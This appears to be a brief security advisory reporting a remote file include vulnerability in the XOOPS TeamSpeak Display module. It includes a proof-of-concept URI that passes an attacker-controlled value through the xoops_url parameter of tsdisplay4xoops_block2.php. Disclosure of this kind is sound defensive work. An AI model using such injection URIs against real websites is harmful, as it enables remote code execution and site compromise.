XOOPS TeamSpeak Display Module TSDisplay4xoops_block2.PHP Remote File Include Vulnerability

Attackers can use a browser to exploit these issues.

The following proof-of-concept URI is available:

http://www.example.com/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell


 

Privacy Statement
Copyright 2010, SecurityFocus